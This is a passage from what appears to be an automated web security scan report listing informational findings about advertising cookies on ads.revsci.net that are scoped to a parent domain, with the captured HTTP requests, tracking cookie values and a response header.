rsi_us_1000000="pUMdJUmnOAIY1E3idJy9P5xdUThji6cmbl0yfrhTyjCHf+MXlD8u4Dpf0WbV2MEF4Ptn0dsRzdffVzzETU6of4++pRgG2lag8DAoBv+l8YX3XQilsoyx7SnlEa1UehCDSGPUAHRbRDKvVP/l/NBkphKHgqatoW/Es9C2bEYOGxQ6RvrAyMCPlU9k1r+UuUMGubwwSXadyFNsWz+pv9wP3+szYzHM/A6vuE9KM/dePOyZlGgOlHPM/Y1IroFxhTfC6Q0+caxpQOG3dMXFWOHaPUm0okqLCNdwRhj081y78hsDctJhbBbdjv0IH6XxpivjJzcqDOtU4RuYeNP1Pz4yoUBTyqC9oAgdx8pehpVaBQbthOnFXxGUF/yB7ikUu5ig61qgiVju/F6i1wpuqcbpdkyu4zpoZfan2fKXvSxwIPCd+mIom4eL/OTKSYUZ5vT2qDtgmoBcX1PIYlyvh6YjUI54PESg7XeADVSQUOxaVQMVoAeDTFYHzCYasCZb+1pRoCX2K+Vbfr83amcfki1jFlliD3wyx5nLpqeMw1sSkZwlsTlpKpI+hJ/sKTcBHI9v2liDRop3P1uZtc5BlUq2bSJ+pzj7kN/wrp0KJHRSqjzTf2hce3dr2DJVRcTEnEXV5husthlq2otZkyp3u1wjVrx0GbekwL2d+EQ1riWcQWpLYgE3QnvmYOUVrA8XdbCp4W+U2fAmiMd2YnNuAwle3NbdgdX8yQmLeU9l3kt7wJ17XlJ+6U4ImPBB/NejbV9+C/J6JU4GbesxHh31tI/cjoeeMt31mqERU+o1Balsy2vsGMMDZSAMm9gpSpVq6shvegudvENtBc/qTVoaw//HCrACTV2CI0m91tSZBai9tiNOvtzyNtrxKV63QHO2CtrOMHBzvh4bf14="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=f09828 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; udm_0=MLv381MJZihrpr4pFtGoS+vQxWHDxijKIfA0nD1YXO8rJ/xUCrr55GtB6tH+GLXHEIQDRgAUsgpjb8Qra3p01ss8sfNs7AbtWw1NMQHbVuHPxDryQTQWihnYn6mP+qW7rJmsUh6JMJetp9XETN/owC1QhOX+6P7c+4riWzBhBBh0hHlQH0Mljz11bOQQy9Po8Tkt4PBjMGKr1Bfz/My2nRuK7D8C6g9uO0ZdIfyxv6GSjZyInaiZGtamS+7APFob9OU4D23sBW1SwUMD/ds2xnVIonlibiNzi17a2Ci3cn7RNBynKV68utYh0Ovmqr8c1tzfmqX4M2kB+/s7Vy40QxV9eDcyPv7QD2ZZMP07MjwVzu7udeJOT3iLHqAcVBo7UzkvOQovXwg7LkXZVvP1mraXg37hy1xUW9h5fCe5b9lSBlAtX2RjJNd5Kw/DAkI9jR+sOwx5I7QhIO08XzQPAbHeq4X/4/G0hBZxKEA2Dct7ZBd0mftbvhhLi6d9lWU1WG1lXuk4y9NKwM0va2Xyz1Lw09OQZDgIyy1zGMeZrZJg+kwRvgMeIDktJKjBuIf97ZXzLsztk2vWivgmeYpKxJ4wDUGU0S3gU3ABHH8jewoHoUlhxqkQ8jkYD7qVT3LNbOp3PtSUgFgciO/JNV+meBiEZQothOKfU9FUkikghycwnLz4dZuMaSAN/NiLtCNgyxyFJ1pETrJ2iDIwVq101NqbmoFi5OtWvxLh+LOggQVGUKjrcv23bOh6jKQKA8zm/ZYtlTuIqd29QjhV72qNCBkQ0CSsYM/3t7TWnuY9MyASx/5TAztlXKLOg1CAtnJp6ROGov+uw97/AjXH5vzpzlW3bxeSnTaVnDLl5KfroKP5t54TABTyBmMfFNAgoKocMu1r1A0by7U0KerVjRkpDPYNv+su9A5dE4Scx2rJSZTQhGqljz7gnt6TmRr/GY3c4ui3vQztSENzi19mPoa0Q3nd4G8BNsuMvXYo5lUc/gzYQhq5MSpuRIP/Y5jCxpM=; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_o6zg=MLsvsLFOMQ5vJpHEvNGJwe3bNDdPqDE7tney9j8XHZxVnCKr9EgfSAe8w4hAY+1S3GROT8pMx0Dk4VfWE4HqpYJRGPSKk1HuHKzz4/0koCkSq5JBQoSmi7zZNoJT0NEAALAtP6fzvZAWXZ+loThQ0WihkO+/o6mSdVwKrgqt65uVFEp8XI4N3ZpjmWzsphrfMQP8kY5P/8jQTq0b7REA668mU80lpsjMzKwzFbryqD4V41L+z9JHKh4rhVL47OYEWipj787OGH+L5uaHYXYNbKq2OBL8iIXHGM+Swv9IOQ5FriyvLu/Z2CaUGb3SZd2dky0d4PEM7QQNkWvbJUUcJPbvZf20Hhlhq8CwdVhIbBVx3SiCZYBPlHik9o2CQ9gk9RT6MakYoJ+gbc9aoDyd41769iZf5VrCQMs1k0du/3q50I3PWYMPgxVJ3cffzI135Z/BwA==; rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC+mHkn1XTh7V8/ZBre5UO8GZbswedStCMJ7UnFnJfymFXcGIeHBb+r5/YGNhB+d; rsiPus_p40C="MLtXrtMvti9nYAD3bv6uJZDWPvAb5rmAbOC1vSsaeKCIpRg1Q0dHTe55BQsYxevmIbNHamJI0N8JSN5tTqULMCjmqoEZiTVnsWkDuaFDB3Wxsgb+dqUDsAhR88Y8/tbo5errEJSJyxK5oqjOi7yC6LapAKMgm87tdc9sJe+K+S51tsgcNG0yafNyT3Mj6ez3yHCqVDZl3JSrA7SGDKtmSqnlcl/KTuqikN3SUl2KPkpJFQVc3m7etpySLFnZBwIjKh7tGEbtQyeLQjD5a5oobWtv9loXNaHqohXE75f1bUXMWji8BYpbX/ehxZr8ddKQTQMDPFg="; rsi_us_1000000="pUMdJT+nPwIU1E3iQFs1Lw7NfjtDG6P2dL1poyhgAWP5Eo4es3kaxW1feZP1YNm+vskrklkV+oIYNjONkByQANVsWNI2LUQx8TCq2WGPl5VXzYIGTGOuqjioCwYxcCLHmCkxz4ESp094zcjlIQUTzGncppB8+UZ13jX8XjRx0I3BL+KAGqLYtL1yR5cosgVr9TChjigtCT7xLSmTxoSu7GRigj7TGlm9TWroY0Q39+iNlTc3BrdjBe0HTkWYH0ShlG+acfzLReAv8qXohHLhe5F9dMgHJSO83a8oSnKmeKGYbW9i7MxX9f9dHDkI4yUr7YhzEgSpDzIQoN8mjvDq8uAicdwkS3Vj6tHxg4FjZP5oJKn7RMzXdrHwiAm5HkJNNq7rKZe60tdAVpLfFLIZU2NXYF5Ng4nUe9B7vLt/JeKgOkuoMXRBd9LPrc+/Bs4Zy2M8IMqrZma4/6vOjeaSPoErPG5h9v54soIwRm/p6mPbNHPXqMGI6iAEpBp39vZnCJ8TPcPuiSkxaucITwjR4ls8ahmnjLIaytIoGLCJ/Gk+WsM5cUzAfduzHzcfr1tiWa348TV6PwF3eayssB/NpybGnJ4mkGwbtdvs76dMdYRClhQnokDRRFqfqHlR5S6hY3Cufhpq2otZn8gHLLXi0UYaHuTtyjHcoW9gZagVsKBU5RI+04gGuvIwxRnBEKwniHi8ZYHXm0BGAaf2rvKUw7FcsM1MDjjAtYrWzUobzJubFmLscTjITZE83wdVVKbPTHCW+E6UqZY3vs2GJOkpG7gaCzt7i/PmMgRey9Ep7w5TQuNKaPbYm0+V7iZOGAnsWlpG0D2TcSxjX6nkaxa+P0zbU7mixMT1h5TkHQHrU4mEOBygWqOWYZoz2ReGBIBfVZfHHBb73A=="

Response

11.8. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsiPus_yjA-="MLtXrl8utl9nIAH3UpyYS5hfBI/9QmnaLO8+oQBTcj1w7zk1SBcuEp11OYV3eoEYGjpFZWOPgoNQci70eKD5Ye/TluCH1ph2OfNJJMjXr2tEwK6lT90zRjTWFir3Smdxu7Pzv7IGaJb71qrC4tVI3Snv040D4KfKVeDwv36XXJk56KbIZB9bXWfOPmlpFy/NYxQNhmbXX7VX4OufOCJaGnRnjt7od3EgCE3JFz3vU3k7mw43bPeHKuGhKee7f4PwRlAXPU22nFtYN+Qzfjq1jqlV4IJnvHjWiSaeoFFH8sW+jqA85vTE9ESWiYb8WI1yKhshWQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMdJUmnOAIY1E3idJy9v6s4JGVJ5ObQ+5teuL11ZXhNSsXZ156dYZ/zFzx7/QK2StGwrzmf3c8cmJlrbiousVEvoToDEFJ1YaJsDm6tTMw+CAf64AC6eY9EN7eZdhTC+Ck513ESp294zWo7X0k04/Z7TVzJyAZ/W3jznJIUEqdU1MvgEn3LxKvvcjO0hJ7zokiDJZC1kr7s8qFNMcCFyZMPGAQ21/szK332YYSpqr4wbbKgSf1iqx1DkHEuFxdbdIDuOLV/7HDr0NSI9lfUz1DeVzP0JmoTPtwzgb8RnYjUpP9j7MJuO/1BHimcP7e6eWWC22CTIo5O5ghe229XFc53R3p/6IVPDoJ0f2o2u6pe4sqNRk8f+ktcpgyfjzEvgM+MPva8Ei9Xo9xSqcZpt0yu9Z/iFCoapf4P2ym1XfY/7kJ6+WWK/OTKSYX5lvT0qD1gmoFUuVLwYl2vhq4jUI9wfESh7XeADVSQEPzaVQMVoBmPTFYHzyc6qCrbDTXvN37EmmLnSUn8n8LX6/nkfMoPz08xYhN15l7cEJAO7eWxfAqYCK5bypxxpTHvd+4cQYCnS8hpP9EFHp7nkU4TLIA7QK/PlvTtIyPuP9fr+OoLZRcVteNeKwbfnhmTiCo7n4X2JZMQxdDny4vMVaWpaHblOeXc8jUsd1A0fax/8Cjpuqt+xYazn2DsB1aqMrYPglKJmcXXOzMrNMqOAD6AkPkBINEu3pbtyG0TWrs76ByH904QwXmVXuhHtLigqnqLxpAOGpU61RvW300ARPPLydRznVLLo3zM6+jS3AbPjds3pX2bLumlDwKTASho04dsVjnTmgsFlZH91XIdGf4XMWshXYvVc4vm04tg0PjkA6w/91baJncnmZLxWvccwNe1Re1P4QUSf9U="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=J06575 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; udm_0=MLv381MJZihrpr4pFtGoS+vQxWHDxijKIfA0nD1YXO8rJ/xUCrr55GtB6tH+GLXHEIQDRgAUsgpjb8Qra3p01ss8sfNs7AbtWw1NMQHbVuHPxDryQTQWihnYn6mP+qW7rJmsUh6JMJetp9XETN/owC1QhOX+6P7c+4riWzBhBBh0hHlQH0Mljz11bOQQy9Po8Tkt4PBjMGKr1Bfz/My2nRuK7D8C6g9uO0ZdIfyxv6GSjZyInaiZGtamS+7APFob9OU4D23sBW1SwUMD/ds2xnVIonlibiNzi17a2Ci3cn7RNBynKV68utYh0Ovmqr8c1tzfmqX4M2kB+/s7Vy40QxV9eDcyPv7QD2ZZMP07MjwVzu7udeJOT3iLHqAcVBo7UzkvOQovXwg7LkXZVvP1mraXg37hy1xUW9h5fCe5b9lSBlAtX2RjJNd5Kw/DAkI9jR+sOwx5I7QhIO08XzQPAbHeq4X/4/G0hBZxKEA2Dct7ZBd0mftbvhhLi6d9lWU1WG1lXuk4y9NKwM0va2Xyz1Lw09OQZDgIyy1zGMeZrZJg+kwRvgMeIDktJKjBuIf97ZXzLsztk2vWivgmeYpKxJ4wDUGU0S3gU3ABHH8jewoHoUlhxqkQ8jkYD7qVT3LNbOp3PtSUgFgciO/JNV+meBiEZQothOKfU9FUkikghycwnLz4dZuMaSAN/NiLtCNgyxyFJ1pETrJ2iDIwVq101NqbmoFi5OtWvxLh+LOggQVGUKjrcv23bOh6jKQKA8zm/ZYtlTuIqd29QjhV72qNCBkQ0CSsYM/3t7TWnuY9MyASx/5TAztlXKLOg1CAtnJp6ROGov+uw97/AjXH5vzpzlW3bxeSnTaVnDLl5KfroKP5t54TABTyBmMfFNAgoKocMu1r1A0by7U0KerVjRkpDPYNv+su9A5dE4Scx2rJSZTQhGqljz7gnt6TmRr/GY3c4ui3vQztSENzi19mPoa0Q3nd4G8BNsuMvXYo5lUc/gzYQhq5MSpuRIP/Y5jCxpM=; rsiPus_SQhO="MLtXrlMusS9rIAH3clmoJlAWvvGY5puCxew1nF+7KKCLIp00Q0d5+4d5FTJN4jWaW7ZHam54EN93XHnHy0rOylMjoJfpR8Ot/hdAS0oi5KMsVxP6pk60ZMcWicI3+tY5pZTOv5Ye+bO5vJziwOr5sQvsZMEna9myPmHrGexS7N4O52XbrX2OHdV2WE8wa4+Y6mYSng5ukBKpAbT3kl1kOcpkc14LJ+MrtSc5HR18lURkSrIbJb0inGWz9icdk6QiSpIZvCNR5/W8QjD5a5oobWvv91oYNaHqohX0SU9QceoEDdPUBYo751C4r5qQrxiWZUYDP4g="; rsi_us_1000000="pUMdJT+DPwIU1E3imYKC+OknDNarDzE9m/tXM2y5OlYSamN+F+xfdu44vAK1LW9qi2ENBLyeepZhpAoNnAZwwWk7okoNeM6hnY4FDeWNdjLp9DlTHNdGEjk0NgfVVxKB0vEnvngZcDTqBTlUIwh2pwKZacn4hm9cIGhFcXIXBU6SBmPbJnKmYxv/0p5EDN4nttB7hb1PTJwj/3mBGjNllA12sUjy7QOOdLxfEl6GmDjn/ZexM7I/fPI8ijGMSHLODmMGd6cbMIsOXjJJNoa5nJ+eMSF/OABhpFm4wTRoY4cV6nEhA+pPAPy1QsXwnrMI2Zr8YTxWbBFIuEKkLLkygAFgwReoUQA9386ahYRsIEOwLY1DxuNmCEA3ro/eDkCbAcvqEvEaCtehjMwNcehJlJKiT/DVk7YmgejB9LBYfaimbXWiFgHFLjhtiBdhR3QpExC/FZXGtZeYojPCKCYJk+UD2QwPJi0x4kB7qieRJB64L9qQZwSP3sZkJ0s95Evev44uttXviYp1xfQC7lDMqITkrFCcbAngqEdxGJfzn1K4jUovAh1xsgERtdrv5sDDDoP5l7x3v9OMyltap0D9DjeeI2xfPY3JHmgN3/CWnVJ63A+xxBghIzHc1IZiEqULnZ8XSyRBT0sY9Sei6BdID8JWlG406zH6X+6a+fgW0oipqwWFEsM5sQFrrGzszpRAm1Fs0XJgbBEUuIf0mSjMrOz9tB1anlpxt/RSHQozzS8XpqrHBXaDTF3WAjVith8T1kQ1rHVxp0K8xYCAYP4tXhXnOCkNDxOwu9yx2EwoZwPUwZVyA3VLxXvUyTVXxj91/H/aU76/1P6hCLxCrR/eIv22mWPYArDid/UvTXbwSjnYN/HMqJiULRLzLBTBUxAr3GLRtUEz"; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_yGBx=MLsvs6FOdg5rJ5G0/9EJWIyw4PHibwH6uVt7/VpenloVcWdNFNZiSxO9y4JBc+DG3WhOTyLGSEm2XKqNsvpwfOWCmJ0c2t+cIL3sSVMoC60oAOQaA0uiQ/KhZUFyt+0zvYGqZnAB4RGmYplfcqtWpNYxHIk/nm2P8mGTBWeBBW+AqOAe1AesQNGNEa3jqWS0zKa8B117g7SP7u4NPTo1wxo+1LK2dj7fi6jyXNyPESyOPB3nXjVgQIWb2uAkhVMzrYIdfgwH0q8JWBvK6DFZGbPCWaFDtzAAHz/pdTyXcdJPSOx98xhP5uBNpeTknXqk2YJ7S7pvoTHbaVmFTviH/UUIjkuAaSrGfELHbX5vv/1BgXGzt7oOVcskB0rxUqhyme0JOcbqr7Sc2eK6lTVu45c5pLhzH2ORR7k7/FLIOA/ayyVBE90wqpSwHe+A4/kXIU6NgxU=; rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC/GONy6nw+ajTz9q356DgSSvhE4wrAr/08mqmTgF2jpTG/LERv68+yK6uHsbh5u

Response

11.9. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsiPus_QYQn="MLtXrt8vtl9rIAF9m8HM9CRwtSv8pwYgsssFOu5OTeOlKAZz5+/wuXtI5aPioHhhdEjAIagkY/G8GHOoPBTZKbe4LvfbnbdkKhONXmKkgHQgdLckCXP0Ycf6bL86yMYbL1uMiqL/s6MNej7gFcLrWQkAx8c6IYdi+yDQifN3Qycz6Jj1em6Y5Eay9ZRgmRVQd4wL1CPn/dRQ4JoZ5iAZWwFtgtxpYZ2eGJoLULxN8vLRSvbSAvOi3Mra/1wX6oTWmDs4ThHYmdgsHYPtkd1lfMJC8ZS8jNp4O4oZuhx+vDf6G8BYd19mNkCBOkzH6Y5GDSLMLc63IB0="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMdJT+nPwIU1E3iQP/BkuMwYFC/diQV0mvz1kXs5llWevPI1xyt5IqzZ0HDpONBtYN5cOLq0Y0MDID8b06p+8YfclUA4HvE3pDVHOKpUDklOCk54RC6OSRkNnczdlHDXHWQC6K2swSQQ8vVN2F0i59OQ6jp4qiSUEONuY85ZLA1Z2OyLU7/10FZsW1qEmbSN89x1MtT5/YXPu6DPZWarOszUzHMAM6vuE+ScvdcP+yZdGgOlHPP/W1ItoFBhTdC6A1Odb9j1OcflxsGDAS+oJUNSD9BzBZwRhj081y7EhoDAlJhbCbdrv1IH+PUUcSGeWWa22CRI45O5ghe229XFch3R1pn6IVPDoJ0f2o2u6pC5soNdicK1r6OIJtTUJYNMJ4Aokj2+wkCi6Dq0alCMv+y91oSzdzJML8XwFhOstZBVOK/yZnmnfQ8mrl2zxNd4jrDQdB3J8hekQlKbwyg04s/a+Xgg6dTRJxRGxiQzc14wcItC4fC6wLc1No6sCqhw3U73G0sjkmOFoTzvKDWN/3nGjFh+adnq0HcLMjR+YKLjDY0tNuQMWEuFltUlAgfqrTRFHxgP/Fn38NCegLSnmgcUO8uIjl9mnNIBv0OpuMGKyGSX7f87985TmujaEs7n4Xy3a8QwtAnyqvCVqWpaHblOUXKl/U05rcz/at/8Kjpeuta5HGv1ZFOr7VvUY+fz9KlfFudANzZAm9Lcnecfk7HsAOBfj/bdkFmEFQ/TOgsExdf2KuIMzN7undJHKkdiOaTnklC9BA1XtwilEI3jTiWQFnsJhae+MXm28ZbizmAiaW7ESZH/CbfiHSOihUPQmrIEP0CEiOHkmwIIoboUPBGX66D1fSP1Oqj1qIKDU2VCS7592sVuMDhONvjwIUedzswvIQMf5g="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=I07714 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_o6zg=MLsvsLFOMQ5vJpHEvNGJwe3bNDdPqDE7tney9j8XHZxVnCKr9EgfSAe8w4hAY+1S3GROT8pMx0Dk4VfWE4HqpYJRGPSKk1HuHKzz4/0koCkSq5JBQoSmi7zZNoJT0NEAALAtP6fzvZAWXZ+loThQ0WihkO+/o6mSdVwKrgqt65uVFEp8XI4N3ZpjmWzsphrfMQP8kY5P/8jQTq0b7REA668mU80lpsjMzKwzFbryqD4V41L+z9JHKh4rhVL47OYEWipj787OGH+L5uaHYXYNbKq2OBL8iIXHGM+Swv9IOQ5FriyvLu/Z2CaUGb3SZd2dky0d4PEM7QQNkWvbJUUcJPbvZf20Hhlhq8CwdVhIbBVx3SiCZYBPlHik9o2CQ9gk9RT6MakYoJ+gbc9aoDyd41769iZf5VrCQMs1k0du/3q50I3PWYMPgxVJ3cffzI135Z/BwA==; rsiPus_NETa="MLtXrkMudi5rIAH3UpwEJpB/RQj/qbmQuWN+RCv7T+OLIs2UoOzw2R6OZozbaj0NZZ45MlkNtMqPVOptzqkKdvD18Zfp9zyM+idE6DRdxshTuowPXaRbsxgmifn/wvKgJ9/VnhrJzKeMgZVTq8IsQARrHBkYIrXxPiLXc3N22revbL0v4m855Eayu7V5ibT1fXUEnuBnm64+IogRugWmliBFss+7oKy0C4/dn2rLIYYUbVP6peeBE3GASWSkD0HguCRTCOCL7EINF3DBxBW7lINJFnudhYTenjgNbTyOJHnaBHD5RLX0Oho8ilqNaKYacw/RPC0="; rsi_us_1000000="pUMdJT+nPwIU1E3iQFs1Lw7NfjtDG6P2ZL1poyhgAWP5Eo4es3kaxW1feYH1YNm+vskrklkV+oIYNjONkByQANVsWNKqFQO5wXMuBl7LrFt9VvH8daQXgvCcc/xZFhpDSH3U4HVbBCIoq/8l/NhnpvaGiiSSrZ8kLGKEIhEwyeTfwOOT0SH98jWN4RywPgioVk8tTltp1p0UlKh8pgAGbJtLLHkzZlncToQPlWxsAy98jyGBAAGwnO3E3u1CL1AuqIBOad2NbOMmZnVBuDsFEtCusRTpf/eP/rfkboM67xVj/XJhGJYPg+W1/zwFI+aFZufGfL+/Z2SQplGqOPI3tNqk8XcE/ujqbTMA1byRkoOorO0+utOKrV87/bLRlYgLprcZr9jfXUBea5L0E99DIw7QmAt9edXA+GWvypoqWxSb7VjYfhviS1vMgyxtybpLpHkmK1YEkJDfxQLh8YRaLfzKLz9BGeRcG/pbGfe3l2iiQU9uA+5pAvvp0MUzDDsQe9Sxw2VU8g6kwqJaqi1jlhlid2LSxhnMJEYMo1sSEx1lsTmfmwdqW4L5W4G6MvPfoCl8AxFxP3k/qZn7W1GCq/vqvjZaJnVKmB9Hclql4FSg2qEI3GVbWPBpVcLHgkPV4kOsfhpa2otVl8jHM7XiwUaaHqTtyjHssQJ17jWcQW5bImC3mymJMwAsGhRzzFoHqEDMZQHWG0FCAaf0r/KQ29FcsMtODjzAtYrezVobTBqbH0qnPV8opyGyzm/uyJoXbzFgdk/tQ6w/7qGwbFrT2Z9Y73puC4yVjAfoDfL6udmM8uk3wTJPMW7M2qrSoxIM+ISFCWM2S3FH+8zXSctZMYCpANgDpbjA3qEy0TwLAonkipN1YQag6ZCxVL+vqRh6ruSTB1r70g=="; rsi_segs_1000000=pUPFecPC7nMQFmLKHV0ITey31RIQwTkWYA7XBUxrAAZisncWnsac5BtpDFUZr6/jfEWlBmKgLSikWJN5CeVI20Xbp+vrNYD6PVldZSUAgu3S7s1bxWP/7kn26cuKgi1K+/Ydf4oafy+ypzYpgeCjqXgiKj8gNT0QkV6VtDzz1yGkT0ImNiyCYCLyTW6llvuj6rbhnFE+nvecITNA4NoSYcIBDuAmpXDMUXN6FvJVluGCUB+a; udm_0=MLv38FMJbiprpr4pgtCoa4a5xWExsOFqd64VnOKEYktoA24C/Ef+EZx1Twi0VADHUAlWk1TBjtT/2wnC6cxBIL3UgC39ISGlxvNxpO1oE0PLF3lKZ1eQq53SUKdS/qq/nNz4iZtcnTXD4iJTfaogQ3MSCq8mqbKhgKfOgOhC+Skc/P20cerX3Xtn8x2Tg57iLmhn5VQ0d5f9VPDzx6GAB9kD+rzx8V/IIzOmhoiWkpNqDJYG0rudGFCpEE3z8NZEw/S0otIypuzNuO1GjcG2YfSplGNhzWWAeY58TBvMrLba24vGp4xXT/9NE8rRl7JYWg5dAoMwfBDHBPRiMmUjfmfj5iE2BJ/yJTB8x3Q2uD0ayEAlhbg+55kuVXtrdg5QNiQuFzMMSSg5AB5A5PEfiLGlDe7AS0lHizhvMPwozEUDRRF2Z2Ar3Er7l6nnASLKWLksCGwfnyIj8jdIqZUxgDjxLhFEW86A2Wj1ING+F1tBHwgXAopFzMsNLaOYfjK4Sjm2BxKI58zliylLdXlqhimol4D+LoKuE2SG+NsQrWR9fahC6aB7SHsyUqJL+VIL+SlbiOKCRr/zGS8ri9i10yXQuP+hVzAaDO2XJHZA5r52gi3+c/5nAIDMvZvWL+14BRDbo/fqhY2cENg3zMwC0lpAv8KsUYiRXkDGEdU0N4MyDFW++3rom4Q8TgytGdfG8bldhmHocPcH6QQqLASsZ8Of2g2SGZWGPrV8zujE28C1OH4S5vrTMm/5wrCgJTlflBSmSogRkoIGyA1XMDChko0HCLF8nJakqfhMLV5MS1kbL/tXQX5BvgJR8ACuqio0XBjFb9JKtX0r+bnLUxLHy1TcjLaPSqGy3RZDY5hm1KcEZIrs++s4/ynkigb88vqv00+3C42ZxsKH/Xc3w5BUu1606GbIiD5tiegmwuLRaqVzkeQLaNSoBc4cjaoXuA+HQZN3QnnC6yxyVviBT8jmQVYoTTj4tv417hPYBLsLr16d/Bm2YQxuHd6cZUgMwfs=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_NETa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_SQhO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_p40C=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ymv_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_yjA-=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jxhu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_vWHn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_IhUn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VkyB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_kT-f=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_6E4b=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5ibF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_QSMB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_7GZu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Ykjc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_B74h=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
